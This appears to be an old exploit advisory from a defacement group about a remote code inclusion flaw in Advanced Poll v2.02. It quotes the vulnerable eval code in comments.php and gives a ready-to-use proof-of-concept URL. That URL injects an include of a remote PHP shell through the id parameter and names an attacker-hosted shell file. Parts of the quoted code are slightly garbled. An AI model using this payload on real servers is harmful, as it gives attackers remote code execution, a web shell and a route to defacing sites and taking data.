Advanced Poll v2.02 :) <= Remote File Inclusion

±-------------------------------------------------------------------
+

• Advanced Poll v2.02 :) <= Remote File Inclusion

±-------------------------------------------------------------------
+

• Affected Software .: Advanced Poll v2.02
• Venedor …: http://www.proxy2.de
• Class …: Remote File Inclusion
• Risk …: high (Remote File Execution)
• Found by …: Pro Hacker
• Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
• Contact …: alguidy[at]hotmail[.]com

±-------------------------------------------------------------------
+

• Code comments.php:
• …
• $register_poll_vars = array("id","template_set","action");
• for ($i=0;$i<sizeof($register_poll_vars);$i++) {

• if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
  

•     eval("\$$register_poll_vars[$i] =
  

\"".trim($HTTP_POST_VARS[$register_poll_vars+ [$i]])."\";");

• } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
  

•     eval("\$$register_poll_vars[$i] =
  

\"".trim($HTTP_GET_VARS[$register_poll_vars+ [$i]])."\";");

• } else {
  

•     eval("\$$register_poll_vars[$i] + '';");
  

• }
  

• }
• …
• =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
• PoC:
• Place a PHPShell on a remote location:
• http://sec-area.com/sh.txt?
• http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd=Http://EvilShell

±-------------------------------------------------------------------

• [W]orld [D]efacers [T]eam
• Greets:
• || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE
  ||
• || P-r-O H-a-C-k-E-r-S ||

±------------------------[ W D T ]----------------------------------